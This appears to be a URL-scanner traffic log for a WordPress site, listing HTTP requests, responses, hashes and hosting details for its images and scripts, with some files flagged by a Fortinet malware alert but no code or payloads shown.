content-length: 227888
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-513x401.png
72.167.59.18200 OK 256 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 256 kB (256290 bytes)
Hash d4687f980072d7bb2d9e5477b92b7807
0f0b4327c7361996f9544425f084f9bf19ebd135
ed23259b0f5c3afef58bc378d8f20803ea62ada4a6e9ac234cb4c187000ccbf1
GET /wp-content/uploads/2021/04/DENTISTERY-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:31:15 GMT
etag: "1580d09-3e922-5c17054195ec0"
accept-ranges: bytes
content-length: 256290
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-1-513x401.png
72.167.59.18200 OK 364 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-1-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 364 kB (363481 bytes)
Hash 96523798de3863a09e1aae8bfa1800e5
c1b07970983ac57a5b71b924ed6d0e6cf31810ad
8cc36a737b95817fa6d146fb1582d5c32f2850f768fbedb554c0d3cd3c0b2c64
GET /wp-content/uploads/2021/04/Vorlage-1-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:31:16 GMT
etag: "1580dcc-58bd9-5c1705428a100"
accept-ranges: bytes
content-length: 363481
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 9405985bfe6aab7c008cf3a305f79b0f
d698b786300ea45e2cd1b9d3fadf2639e71efe5e
28c7a840f64d83b92b41d7255788845fbe83aefbee8acf3d8cb131ffd81f6267
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 5329
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:41 GMT
Last-Modified: Wed, 21 Sep 2022 02:54:52 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 471
app.leadfox.co/js/detect.min.js?_=1586443542474
172.67.71.4200 OK 21 kB URL HTTP/2 app.leadfox.co/js/detect.min.js?_=1586443542474
IP 172.67.71.4:0
File type Unicode text, UTF-8 text, with very long lines (2609)
Hash af5059cc7266e707b529c7ae10692bb8
cc2aa444c28f3a810e489c2f3c8df54de878acc7
d434123fad53a7e88e957a4956162d6731c1bc7a4ab21f8df8d344cf8c1e547c
GET /js/detect.min.js?_=1586443542474 HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"a7c-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 1
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wEuuhdyx5Re7MFUn1pj%2Bixe%2BBndE41KJjRblUZh3QOedgf6DlgtY2WQ3xpnuMhfQdFvaOvAaijS8H%2Fvw6YRS%2Fyv8gIE07QpkSuGwhLDbr5%2BEvLsC8FymFSvA6bY5gJg3"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006de8ab9b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
142.250.74.170200 OK 23 B URL HTTP/2 maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
IP 142.250.74.170:0
File type JSON data\012- , ASCII text
Hash e3981ca10169a319d5aa062bf43a5fa1
2c6ed584767b65688ce99b1ebe1a3b7448a67421
8b0b8749aba12de93f3cf5d86f9fac9d6de7cac400a17473718f182a34ebb7e9
GET /maps/api/mapsjs/gen_204?csp_test=true HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/json; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:41 GMT
server: scaffolding on HTTPServer2
cache-control: private
content-length: 23
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.comm2po.ca
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
connect.facebook.net/en_US/fbevents.js
157.240.200.14200 OK 27 kB URL HTTP/2 connect.facebook.net/en_US/fbevents.js
IP 157.240.200.14:0
File type ASCII text, with very long lines (64348)
Hash 9ecd89752214ef749272eef344b9089a
70a58a49c08934265ee34c74efb01d6b3124095d
f76c51487e348977288fcaf83984cd8fe4e73758cc352402774d9eb94680d528
GET /en_US/fbevents.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-type: application/x-javascript; charset=utf-8
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: public
cache-control: public, max-age=1200
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
x-fb-debug: EAPtNMMRjsDvns4zjp5nH8eRWXQtVv813AcYIjA+D0RYVkuYpGjUeZu/HasuxEqY2mnsvUL5sA/RrGEVghCDDQ==
priority: u=3,i
content-length: 26839
x-fb-trip-id: 1679558926
date: Wed, 21 Sep 2022 04:23:41 GMT
alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 9405985bfe6aab7c008cf3a305f79b0f
d698b786300ea45e2cd1b9d3fadf2639e71efe5e
28c7a840f64d83b92b41d7255788845fbe83aefbee8acf3d8cb131ffd81f6267
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 5329
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:41 GMT
Last-Modified: Wed, 21 Sep 2022 02:54:52 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 471
www.comm2po.ca/?icl_ajx_action=get_browser_language
72.167.59.18200 OK 9 B URL HTTP/2 www.comm2po.ca/?icl_ajx_action=get_browser_language
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with no line terminators
Hash 85195af014e30a83c0bf68b5e79606ae
e6ab71d0a8ca3fc0ca2215c648edb0e3693ee484
48378584ae0e9d5926960effac0f661f44045c69ed59932600acab1df91ca6ab
Analyzer Verdict Alert fortinet Malware
GET /?icl_ajx_action=get_browser_language HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
cache-control: no-cache, must-revalidate
expires: Sat, 16 Aug 1980 05:00:00 GMT
set-cookie: _icl_current_language=fr; expires=Thu, 22-Sep-2022 04:23:40 GMT; Max-Age=86400; path=/
content-encoding: br
content-length: 9
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:40 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2015/05/favicon.ico
72.167.59.18200 OK 334 B URL HTTP/2 www.comm2po.ca/wp-content/uploads/2015/05/favicon.ico
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel\012- data
Hash daef6820b1b3e7bb9f65541b4e417223
68d07c615e288713f368c5405fc1c3174f72f363
cc9bd62da168338828957d3251e0a00a60334c090b50697229587b794264ac34
GET /wp-content/uploads/2015/05/favicon.ico HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 20 May 2015 09:40:00 GMT
etag: "15800aa-47e-5168035ee7c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 334
content-type: image/x-icon
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2015/05/logo_BW.png
72.167.59.18200 OK 2.4 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2015/05/logo_BW.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 121 x 80, 8-bit/color RGBA, non-interlaced\012- data
Hash ec5a697e58986ee850ddda77287a5f8f
3221d97ec3f52f3210565adda79ff887e037776d
9b6a35e56a8a51c56a40402bf9bc2940030cf34ee601749d94bb5d2f73b1109c
GET /wp-content/uploads/2015/05/logo_BW.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 20 May 2015 11:10:53 GMT
etag: "15800ad-936-516817af4a940"
accept-ranges: bytes
content-length: 2358
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/en/
72.167.59.18200 OK 15 kB IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (2439), with CRLF, LF line terminators
Hash 727d2a0ba00175c82ff9cb9e9ce28366
3be048e0cd7f6f5d551a24ae0ed732f51b6e9396
441898b893b5ae7131528118de312f34d9764b7f4268b0af6c3c44880bfef7ee
Analyzer Verdict Alert fortinet Malware
GET /en/ HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
cache-control: max-age=3, must-revalidate
content-encoding: br
content-length: 15347
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js?version=5.4.8
72.167.59.18200 OK 6.7 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (25833), with CRLF line terminators
Hash e8fcd6b43bc732267192b1d9c238a575
4c7dc7cd56c113c6fa113089ef7c63907cbc8752
ae071dc8b7172b3604ebe83b8e1d2db5af9f74d73e83cdfd8a7987ae125a02fc
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614d2-65df-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 6697
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js?version=5.4.8
72.167.59.18200 OK 3.0 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (10692), with CRLF line terminators
Hash 1872eeeb19c147c7719d286f74563b53
a5f9f14c4ab6a1f26df6e472e3168493a085a2c8
3e36368893237bff254320682110a220f1f13c3e06222d91ac25044486db8616
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614d0-2ab3-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 3011
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js?version=5.4.8
72.167.59.18200 OK 6.5 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (28818), with CRLF line terminators
Hash 6280f70224172de2a66a8f73f3f933fc
c5a06ac89d66cf178c7f655aa226ebf6cac46512
6dcf77bfef23923766c8a1c511ecfabd1f5d745fbe765c1584317e8a1c1a9dc7
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614d1-718e-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 6531
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js?version=5.4.8
72.167.59.18200 OK 14 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (55556), with CRLF line terminators
Hash 74707f26b7e6a75367b7ad799993e0a3
7ced582cc5c381872846add8e92940c187e5b4b2
57aaac3502411c137f10b1e5a2e1e3670dfe7dfced7101bffd381d7977a61f90
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614cd-da01-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 13751
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
secure.leadforensics.com/js/147022.js
51.140.49.131200 OK 136 B URL HTTP/1.1 secure.leadforensics.com/js/147022.js
IP 51.140.49.131:0
ASN #8075 MICROSOFT-CORP-MSN-AS-BLOCK
File type ASCII text, with no line terminators
Hash bb5bd93a4a1897303df838a0d514d877
6fef6703a36252ae2eea0126fd9bb8dc85b61f85
c3dcfc6bd153ed707bc55c33d9aad508a355322780b88334a84285646379d1c7
GET /js/147022.js HTTP/1.1
Host: secure.leadforensics.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Server: Kestrel
Request-Context: appId=cid-v1:abe8a76f-f1a2-4b2e-9017-0ea36ffb5c20
Date: Wed, 21 Sep 2022 04:23:41 GMT
Content-Length: 136
www.comm2po.ca/wp-content/uploads/2021/04/tcc-canada-513x401.jpg
72.167.59.18200 OK 41 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/tcc-canada-513x401.jpg
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 513x401, components 3\012- data
Hash 899e22b7e8367b307b1644eb63877c0f
e167d9881213b66e60d717893a009a4536706668
ed778febe3f4710c387f5bf8e4fdcd49e092bd1985d23d47cc1428d0f5dc306e
GET /wp-content/uploads/2021/04/tcc-canada-513x401.jpg HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:23:24 GMT
etag: "1580e2a-a0b3-5c17038067b00"
accept-ranges: bytes
content-length: 41139
content-type: image/jpeg
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-513x401.png
72.167.59.18200 OK 228 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 228 kB (227888 bytes)
Hash 9cde152a6750ad15b7d509cf7e2be2fa
3dd36be6f2c3394066d24c9841ade0a19c1dcab5
fad01e74d3003c5df6aa9561bd7046ef8696f8ead4aed6cec1cc4d84612d7741
GET /wp-content/uploads/2021/04/Lyticainc-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:54:06 GMT
etag: "1580d6b-37a30-5c170a5d12b80"
accept-ranges: bytes
content-length: 227888
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-1-513x401.png
72.167.59.18200 OK 256 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-1-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 256 kB (256290 bytes)
Hash d4687f980072d7bb2d9e5477b92b7807
0f0b4327c7361996f9544425f084f9bf19ebd135
ed23259b0f5c3afef58bc378d8f20803ea62ada4a6e9ac234cb4c187000ccbf1
GET /wp-content/uploads/2021/04/DENTISTERY-1-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:10:53 GMT
etag: "1580d03-3e922-5c1700b432140"
accept-ranges: bytes
content-length: 256290
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-513x401.png
72.167.59.18200 OK 364 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 364 kB (363481 bytes)
Hash 96523798de3863a09e1aae8bfa1800e5
c1b07970983ac57a5b71b924ed6d0e6cf31810ad
8cc36a737b95817fa6d146fb1582d5c32f2850f768fbedb554c0d3cd3c0b2c64
GET /wp-content/uploads/2021/04/Vorlage-513x401.png HTTP/1.1
Host: www.comm2po.ca
